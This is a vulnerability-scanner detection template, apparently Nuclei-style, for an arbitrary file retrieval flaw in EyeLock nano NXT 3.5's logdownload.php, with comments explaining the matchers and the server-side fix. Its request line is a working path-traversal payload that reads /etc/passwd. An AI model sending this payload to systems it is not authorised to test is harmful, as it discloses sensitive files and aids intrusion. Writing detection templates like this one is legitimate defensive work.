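# Detection template for the file retrieval issue described in info.description:
# one GET request is sent, and a finding is reported only when both matchers
# below succeed.
id: eyelock-nano-lfd

info:
  name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
  author: geeknik
  severity: high
  description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
  reference:
    - https://www.zeroscience.mk/codes/eyelock_lfd.txt
  metadata:
    # Number of HTTP requests this template issues per target.
    max-request: 1
  tags: iot,lfi,eyelock

# Defender note: the root cause named in the description is missing
# verification of the 'path' parameter, so the fix belongs server-side
# (resolve the requested path and refuse anything outside the intended log
# directory). A positive result means a file outside that directory was
# returned over HTTP.
# NOTE(review): whether this endpoint requires authentication is not shown
# here; confirm against the referenced advisory.
http:
  - method: GET
    path:
      # Requests /etc/passwd through 'path' with parent-directory sequences;
      # the file is used only as a well-known, recognisable marker.
      - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"

    # Both matchers must hold, so a bare 200 response is not reported.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Body must contain a passwd-format root entry (password field 'x' or
      # '*', UID 0, GID 0); this keeps generic 200/error pages from matching.
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

# NOTE(review): the digest below is the signature published with the original
# template text. Any edit to this file, presumably including added comments,
# means the template must be re-signed before a scanner that enforces signed
# templates will treat it as verified; confirm with the signing tool.
# digest: 4a0a00473045022032e52a55ea074d1260dcdd3cd9cca43408e1a518dfec633df2d5865351fd27a40221009f4d1d65699d6288cd8a54a263927849b4e093b88e3d61bb69fb0da42495cbc6:922c64590222798bb761d5b6d8e72950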